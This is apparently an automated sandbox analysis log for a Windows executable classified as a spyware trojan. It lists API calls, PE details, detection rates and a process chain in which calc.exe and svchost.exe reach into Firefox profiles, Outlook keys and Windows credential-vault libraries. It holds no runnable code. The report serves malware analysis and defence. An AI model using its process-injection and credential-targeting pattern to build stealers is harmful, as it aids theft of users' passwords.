Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C60 NtCreateKey,	2_2_03A72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73090 NtSetValueKey,	2_2_03A73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73010 NtOpenDirectoryObject,	2_2_03A73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A739B0 NtGetContextThread,	2_2_03A739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73D10 NtOpenProcessToken,	2_2_03A73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73D70 NtOpenThread,	2_2_03A73D70

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FFA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00FFA1EF

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FE8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00FE8310

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FF51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00FF51BD

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00F9E6A0	0_2_00F9E6A0
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FBD975	0_2_00FBD975
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00F9FCE0	0_2_00F9FCE0
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FB21C5	0_2_00FB21C5
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FC62D2	0_2_00FC62D2
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_010103DA	0_2_010103DA
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FC242E	0_2_00FC242E
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FB25FA	0_2_00FB25FA
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FA66E1	0_2_00FA66E1
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FEE616	0_2_00FEE616
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FC878F	0_2_00FC878F
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FF8889	0_2_00FF8889
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FC6844	0_2_00FC6844
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FA8808	0_2_00FA8808
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_01010857	0_2_01010857
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FBCB21	0_2_00FBCB21
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FC6DB6	0_2_00FC6DB6
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FA6F9E	0_2_00FA6F9E
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FA3030	0_2_00FA3030
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FBF1D9	0_2_00FBF1D9
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FB3187	0_2_00FB3187
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00F91287	0_2_00F91287
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FB1484	0_2_00FB1484
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FA5520	0_2_00FA5520
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FB7696	0_2_00FB7696
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FA5760	0_2_00FA5760
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FB1978	0_2_00FB1978
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FC9AB5	0_2_00FC9AB5
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_01017DDB	0_2_01017DDB
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FBBDA6	0_2_00FBBDA6
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FB1D90	0_2_00FB1D90
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FA3FE0	0_2_00FA3FE0
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00F9DF00	0_2_00F9DF00
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_01BDB150	0_2_01BDB150
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C63	2_2_00418C63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004010C0	2_2_004010C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004010B8	2_2_004010B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401200	2_2_00401200
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402A20	2_2_00402A20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403310	2_2_00403310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F393	2_2_0042F393
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041044B	2_2_0041044B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410453	2_2_00410453
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402511	2_2_00402511
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040251F	2_2_0040251F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402520	2_2_00402520
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416E5F	2_2_00416E5F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416E63	2_2_00416E63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410673	2_2_00410673
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E673	2_2_0040E673
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402EAF	2_2_00402EAF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402EB0	2_2_00402EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402730	2_2_00402730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E7C3	2_2_0040E7C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E7B7	2_2_0040E7B7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B003E6	2_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA352	2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC02C0	2_2_03AC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF41A2	2_2_03AF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B001AA	2_2_03B001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF81CC	2_2_03AF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30100	2_2_03A30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC8158	2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3C7C0	2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64750	2_2_03A64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5C6E0	2_2_03A5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B00591	2_2_03B00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEE4F6	2_2_03AEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4420	2_2_03AE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF2446	2_2_03AF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF6BD7	2_2_03AF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFAB40	2_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0A9A6	2_2_03B0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A268B8	2_2_03A268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E8F0	2_2_03A6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4A840	2_2_03A4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A42840	2_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABEFA0	2_2_03ABEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4CFE0	2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A82F28	2_2_03A82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60F30	2_2_03A60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE2F30	2_2_03AE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4F40	2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52E90	2_2_03A52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFCE93	2_2_03AFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFEEDB	2_2_03AFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFEE26	2_2_03AFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40E59	2_2_03A40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A58DBF	2_2_03A58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3ADE0	2_2_03A3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4AD00	2_2_03A4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADCD1F	2_2_03ADCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0CB5	2_2_03AE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30CF2	2_2_03A30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40C00	2_2_03A40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A8739A	2_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF132D	2_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2D34C	2_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A452A0	2_2_03A452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE12ED	2_2_03AE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5B2C0	2_2_03A5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4B1B0	2_2_03A4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7516C	2_2_03A7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2F172	2_2_03A2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0B16B	2_2_03B0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF70E9	2_2_03AF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF0E0	2_2_03AFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEF0CC	2_2_03AEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A470C0	2_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF7B0	2_2_03AFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF16CC	2_2_03AF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A85630	2_2_03A85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADD5B0	2_2_03ADD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B095C3	2_2_03B095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7571	2_2_03AF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF43F	2_2_03AFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A31460	2_2_03A31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5FB80	2_2_03A5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB5BF0	2_2_03AB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7DBF9	2_2_03A7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFB76	2_2_03AFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADDAAC	2_2_03ADDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A85AA0	2_2_03A85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE1AA3	2_2_03AE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEDAC6	2_2_03AEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB3A6C	2_2_03AB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFA49	2_2_03AFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7A46	2_2_03AF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD5910	2_2_03AD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A49950	2_2_03A49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5B950	2_2_03A5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A438E0	2_2_03A438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAD800	2_2_03AAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFFB1	2_2_03AFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A41F92	2_2_03A41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A03FD2	2_2_03A03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A03FD5	2_2_03A03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFF09	2_2_03AFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A49EB0	2_2_03A49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5FDC0	2_2_03A5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7D73	2_2_03AF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A43D40	2_2_03A43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF1D5A	2_2_03AF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFCF2	2_2_03AFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB9C32	2_2_03AB9C32

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03ABF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A75130 appears 58 times
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: String function: 00F97DE1 appears 35 times
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: String function: 00FB0AE3 appears 70 times
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: String function: 00FB8900 appears 42 times

Source: bkTW1FbgHN.exe, 00000000.00000003.1483532312.0000000004363000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs bkTW1FbgHN.exe
Source: bkTW1FbgHN.exe, 00000000.00000003.1482829369.000000000450D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs bkTW1FbgHN.exe

Source: bkTW1FbgHN.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@9/8

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FFA06A GetLastError,FormatMessageW,

0_2_00FFA06A

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FE81CB AdjustTokenPrivileges,CloseHandle,		0_2_00FE81CB
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FE87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00FE87E1

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FFB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00FFB3FB

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_0100EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0100EE0D

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_010083BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_010083BB

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00F94E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00F94E89

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

File created: C:\Users\user\AppData\Local\Temp\autB68F.tmp

Jump to behavior

Source: bkTW1FbgHN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: calc.exe, 00000005.00000002.3336312350.0000000003380000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3336312350.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000003.2085614077.0000000003380000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000003.2085614077.000000000335F000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3336312350.000000000338C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: bkTW1FbgHN.exe	Virustotal: Detection: 58%
Source: bkTW1FbgHN.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\bkTW1FbgHN.exe "C:\Users\user\Desktop\bkTW1FbgHN.exe"
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bkTW1FbgHN.exe"
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	Process created: C:\Windows\SysWOW64\calc.exe "C:\Windows\SysWOW64\calc.exe"
Source: C:\Windows\SysWOW64\calc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bkTW1FbgHN.exe"	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	Process created: C:\Windows\SysWOW64\calc.exe "C:\Windows\SysWOW64\calc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: bkTW1FbgHN.exe

Static file information: File size 1203712 > 1048576

Source: bkTW1FbgHN.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bkTW1FbgHN.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bkTW1FbgHN.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bkTW1FbgHN.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bkTW1FbgHN.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bkTW1FbgHN.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: bkTW1FbgHN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: calc.pdbGCTL source: svchost.exe, 00000002.00000003.1855097265.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1855699365.000000000342B000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3336433615.0000000000730000.00000004.00000020.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3336433615.0000000000718000.00000004.00000020.00020000.00000000.sdmp
